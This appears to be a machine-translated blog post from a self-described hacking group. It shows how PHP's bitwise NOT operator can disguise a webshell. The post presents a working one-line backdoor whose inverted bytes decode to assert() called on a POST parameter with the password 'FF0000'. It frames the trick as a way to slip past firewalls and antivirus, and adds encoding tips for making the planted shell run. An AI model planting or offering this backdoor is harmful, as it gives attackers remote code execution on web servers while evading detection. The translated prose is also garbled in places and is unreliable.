Use bitwise inversion in PHP (~) Function creation Backdoor

1) PHP ~ Bitwise operators

PHP: bitwise operator-http://www.php.net/manual/zh/language.operators.bitwise.php

Some time ago, a foreigner posted an interesting things on twitter. after a string of suspected garbled characters was accessed, it could normally output 1337, so he had the following research results.

1. ~ $ A Not (bitwise inversion) sets the bit 0 in $ a to 1, and vice versa.

PHP ini sets error_reporting to use a bitwise value, providing a real example of disabling a bit. All errors except the prompt level should be displayed.

Php. ini is used as follows:E_ALL &~ E_NOTICE

The specific operation method is to first obtain the value of E_ALL: 00000000000000000111011111111111

Then get the value of E_NOTICE: 00000000000000000000000000001000

Then~Reversed: 11111111111111111111111111110111

Finally, we use the bitwise AND (&) to get the BIT (1) set in both values: 00000000000000000111011111110111

 

2) analysis and Reproduction

This is the original code implementation effect at that time:

When you see this effect, the first thing you think of is to bypass the implementation of backdoors such as firewalls, and then start to consider which encoding method is used?

Later, I used echo directly in the test with Li pujun ~ '1'; The above 'garbled 'will be directly output ~ The explanation of the function was suddenly enlightened.

Then we can start writing a sentence to try the effect:

 

<?php$x=~Ÿ¬¬º­«;$x($_POST[~¹¹ÏÏÏÏ]);?>

Here, the $ x variable is defined as ASSERT, And the password is FF0000, which can be directly linked to the backdoor, because when the bit is reversed out of 'garbled ', we can take another reverse to return the normal value.

 

3) coding and kill-free

When I reproduce this backdoor, I found that the direct Copy over HTTP status 500, the source is the encoding problem, the above 'garbled 'is actually Western Europe (ISO-8859-15 ).

In the actual process, we have encountered many Backdoors that cannot be linked. The Error 500 is returned because of encoding problems. If the default encoding cannot be identified, save the encoding method as this (GBK \ UTF8 \... cannot be used successfully)

 

Author: Evi1m0 [Email: evi1m0 # ff0000.cc]

From: evil Red Information Security Organization [FF0000 TeAm]